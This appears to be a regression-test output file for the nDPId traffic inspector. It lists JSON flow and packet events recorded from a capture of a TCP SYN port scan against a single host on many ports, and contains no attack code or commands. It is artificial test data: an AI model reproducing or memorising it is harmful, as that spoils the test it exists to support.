-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsRK4AADsGyMSsEAAIQA2GNIzSC5fdUoMYAAAAAGACEAAc+AAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsOd4AADMG25SsEAAIQA2GNIzSAATdUoMYAAAAAGACEAAoiwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsgJQAADUGkt6sEAAIQA2GNIzSBDrdUoMYAAAAAGACCAAsVQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsftgAACcGopqsEAAIQA2GNIzSBfHdUoMYAAAAAGACEAAingAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsN+EAACYG6pGsEAAIQA2GNIzSCDTdUoMYAAAAAGACDAAkWwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsqgcAADcGZ2usEAAIQA2GNIzSA+ndUoMYAAAAAGACEAAkpgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsDusAACwGDYisEAAIQA2GNIzSH5rdUoMYAAAAAGACBAAU9QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsCKQAADQGC8+sEAAIQA2GNIzSB3rdUoMYAAAAAGACBAAtFQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsNx4AACgG6VSsEAAIQA2GNIzSHwHdUoMYAAAAAGACBAAVjgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsdyIAADIGn1CsEAAIQA2GNIzTC77dU4MZAAAAAGACDAAgzgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsqZ8AADkGZdOsEAAIQA2GNIzTDGDdU4MZAAAAAGACCAAkLAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ+QAAC0G846sEAAIQA2GNIzTFlbdU4MZAAAAAGACCAAaNgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAstxwAADEGYFasEAAIQA2GNIzTJxrdU4MZAAAAAGACCAAJcgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsWJwAADUGutasEAAIQA2GNIzTwALdU4MZAAAAAGACCABwiQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAspbMAADUGbb+sEAAIQA2GNIzTRkTdU4MZAAAAAGACCADqRwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAszIwAADAGS+asEAAIQA2GNIzTDtndU4MZAAAAAGACBAAlswAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsOLAAADEG3sKsEAAIQA2GNIzTAFTdU4MZAAAAAGACCAAwOAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAs7mkAADAGKgmsEAAIQA2GNIzTDybdU4MZAAAAAGACBAAlZgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAs2sEAAC4GP7GsEAAIQA2GNIzTJQ3dU4MZAAAAAGACDAAHfwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsGVoAACcGCBmsEAAIQA2GNIzTJw\/dU4MZAAAAAGACEAABfQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsCYIAADoGBPGsEAAIQA2GNIzTFb7dU4MZAAAAAGACDAAWzgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":861,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsr3QAADgGYP6sEAAIQA2GNIzTFYbdU4MZAAAAAGACBAAfBgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":862,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsZqgAADEGsMqsEAAIQA2GNIzTwATdU4MZAAAAAGACCABwhwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsBTkAADYGDTqsEAAIQA2GNIzTgAvdU4MZAAAAAGACDACsgAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":864,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsZFYAAC4GthysEAAIQA2GNIzSBAXdUoMYAAAAAGACDAAoigAAAgQFtA=="} 